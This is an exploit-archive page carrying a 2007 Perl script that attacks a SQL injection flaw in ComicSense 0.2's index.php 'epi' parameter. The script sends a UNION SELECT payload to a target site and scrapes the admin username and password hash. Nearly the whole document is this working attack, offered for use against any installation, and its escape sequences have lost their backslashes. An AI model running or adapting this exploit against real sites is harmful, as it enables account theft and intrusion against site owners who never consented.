[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Comicsense 0.2 (index.php epi) Remote SQL Injection Exploit
# Published : 2007-06-06
# Author : Silentz
# Previous Title : PBLang <= 4.67.16.a Remote Code Execution Exploit
# Next Title : Wordpress 2.2 (xmlrpc.php) Remote SQL Injection Exploit
#!/usr/bin/perl -w
#################################################################################
# #
# ComicSense 0.2 SQL Injection Exploit #
# #
# Discovered by: s0cratex #
# Payload: Admin Username & Hash Retrieval #
# Website: http://www.w4ck1ng.com #
# #
# Original Advisory: http://seclists.org/bugtraq/2007/Jun/0063.html #
# http://milw0rm.com/exploits/4035 #
# #
# Vulnerable Code (index.php): #
# #
# $sqlQuery = "SELECT * FROM " . $prefix . "comic WHERE episodenr = $epi"; #
# #
# PoC: http://victim.com/index.php?epi=-999 UNION SELECT username,0,password #
# FROM users LIMIT 1 #
# #
# Subject To: Nothing #
# GoogleDork: Get your own! #
# #
# Shoutz: The entire w4ck1ng community & s0cratex #
# #
#################################################################################
use LWP::UserAgent;
if (@ARGV < 1){
print "-------------------------------------------------------------------------rn";
print " ComicSense 0.2 SQL Injection Exploitrn";
print "-------------------------------------------------------------------------rn";
print "Usage: w4ck1ng_comicsense.pl [PATH]rnrn";
print "[PATH] = Path where ComicSense is locatedrnrn";
print "e.g. w4ck1ng_comicsense.pl http://victim.com/comic/rn";
print "-------------------------------------------------------------------------rn";
print " http://www.w4ck1ng.comrn";
print " ...Silentzrn";
print "-------------------------------------------------------------------------rn";
exit();
}
$b = LWP::UserAgent->new() or die "Could not initialize browsern";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $ARGV[0] . "index.php?epi=-999 UNION SELECT username,0,password FROM users LIMIT 1";
$res = $b->request(HTTP::Request->new(GET=>$host));
$res->content =~ /.jpg" alt="#(.*?):/;
($user) = $res->content =~ /.jpg" alt="#(.*?):/;
($hash) = $res->content =~ /: ([0-9a-fA-F]{32})" />/;
if($user && $hash){
print "-------------------------------------------------------------------------rn";
print " ComicSense 0.2 SQL Injection Exploitrn";
print "-------------------------------------------------------------------------rn";
print "[+] Admin User : $usern";
print "[+] Admin Hash : $hashn";
print "-------------------------------------------------------------------------rn";
print " http://www.w4ck1ng.comrn";
print " ...Silentzrn";
print "-------------------------------------------------------------------------rn";
} else {
print "nExploit Failed...n";
}
# www.Syue.com [2007-06-06]